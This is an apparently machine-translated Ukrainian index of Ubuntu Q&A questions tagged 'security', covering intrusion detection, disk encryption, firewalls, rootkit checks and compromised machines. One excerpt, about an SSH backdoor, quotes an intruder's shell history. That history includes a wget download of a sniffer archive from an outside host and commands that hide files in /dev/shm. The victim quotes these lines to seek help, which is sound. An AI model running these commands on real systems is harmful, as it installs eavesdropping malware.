Запитання з тегом «security»

Безпека охоплює широкий набір тем, включаючи користувачів, дозволи, автентифікацію, авторизацію, оновлення, брандмауер, загартовування тощо.

3
Які автоматизовані налаштування сповіщень про вторгнення / виявлення корисні для домашнього робочого столу?
Я використовую Linux досить довгий час, і я завжди відчуваю необхідність встановити пасивне налаштування програмного забезпечення / скрипту, яке може попереджати мене про будь-які підозрілі мережеві дії, такі як сканування, невдалі спроби входу в систему, електронною поштою або електронною поштою. візуальні / аудіоповідомлення. Я знаю, як шукати журнали та інше, …


2
Двофакторне шифрування повного диска Yubikey за допомогою LUKS
Нещодавно я придбав Yubikey Neo - чудовий маленький апаратний пристрій аутентифікації другого фактора. Він в першу чергу призначений для використання з одноразовими паролями та новим протоколом U2F, але, оскільки версія Yubikey 2, вона також підтримує аутентифікацію HMAC-SHA1 виклик-відповідь. HMAC-SHA1 поєднує секретний ключ (зберігається всередині Yubikey) і поєднує це із парольною …

2
Це погана ідея одночасно запускати SELinux і AppArmor?
У моїй корпоративній політиці зазначено, що поля Linux повинні бути захищені SELinux (щоб аудитор безпеки міг встановити прапорець "так, ми надзвичайно безпечні!" Для кожного сервера). Я сподівався скористатися дивовижною безпекою AppArmor за замовчуванням Ubuntu. Нерозумно запускати і Apparmor, і SELinux? (Якщо так, то чи можна цю погану ідею пом'якшити за …

6
Персональний комп'ютер зламаний: Як я можу заблокувати цього користувача знову входити в систему? Як дізнатися, як вони входять?
Я на 99,9% впевнений, що моя система на моєму персональному комп’ютері проникла. Дозвольте спочатку дати свої міркування, щоб ситуація стала зрозумілою: Приблизний графік підозрілої діяльності та вжитих подальших дій: 4-26 23:00 Я закінчив усі програми і закрив ноутбук. 4-27 12:00 Я відкрив свій ноутбук після того, як він був у …


5
Наскільки важливий пароль sudo?
Я знаю, що пароль sudo захищає мій комп'ютер від локального злому того, хто має фізичний доступ до нього ( редагувати: насправді, це не так ). Мій пароль досить сильний для цієї мети, але я знаю, що він недостатньо сильний, якщо хтось може його віддалено змусити. Чи може хтось отримати доступ …

6
Як я можу підтвердити, що бінарні файли мого Ubuntu є вихідним кодом, з якого він повинен бути?
Як і 99% користувачів, я встановлюю Ubuntu з готових бінарних файлів. Як я можу переконатися, що ці бінарні файли насправді є вихідним вихідним кодом від Ubuntu? Було б добре переконатися, що NSA / хтось не співпрацював ні з Ubuntu, ні з Linode (мій постачальник VPS), щоб возитися з бінарними файлами. …
25 security 

5
Чи є попередньо встановлений або автоматичний брандмауер?
Чи постачається Ubuntu з попередньо встановленим або автоматичним брандмауером? Якщо ні, то мені потрібен? Я прочитав деякі статті про переваги Linux над іншими операційними системами щодо безпеки (не потрібно мати антивірус, ...), але хотів би бути впевненим.

1
rkhunter попередження про /etc/.java /etc/.udev /etc/.initramfs
Я працюю на Ubuntu 10.04.1 LTS. Я запускаю rkhunter, щоб перевірити наявність руткітів. rkhunter скаржиться на такі приховані файли та каталоги. Я думаю, що ці файли не є справжньою проблемою в моїй системі, але як я можу перевірити, чи є ці файли законними файлами? [07:57:45] Checking for hidden files and …

2
Знайдено SSH Backdoor на VServer. Що робити?
Вчора я перевірив свою історію команд на своєму VServer. Я знайшов кілька підозрілих рядків. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . …
24 ssh  security  malware 

2
Чи безпечне оновлення мета-випуску (do-release-upgrade)?
Я намагаюся зрозуміти do-release-upgradeпроцес, тобто спосіб, який Ubuntu спонукає мене перейти до наступного весняного чи осіннього випуску Ubuntu. Прочитавши джерела, ubuntu-release-upgraderя знайшов файл / etc / update-manager / meta-release у своїй системі. Цей файл, використовуючи URL-адресу HTTP, вказує на http://changelogs.ubuntu.com/meta-release, де перераховані різні версії Ubuntu від Warty 04.10 до Raring …


2
Як система зберігається в безпеці?
Я розумію, що якщо будь-яке зловмисне програмне забезпечення потрапляє в систему Linux, воно, як мінімум, отримає привілей на рівні користувача та зруйнує все, що знаходиться в межах досяжності конкретного користувача, тобто власні файли користувача. Але що саме утримує від шкідливих програм доступ до кореневого доступу? Чи не може він якось …
24 security 


Використовуючи наш веб-сайт, ви визнаєте, що прочитали та зрозуміли наші Політику щодо файлів cookie та Політику конфіденційності.
Licensed under cc by-sa 3.0 with attribution required.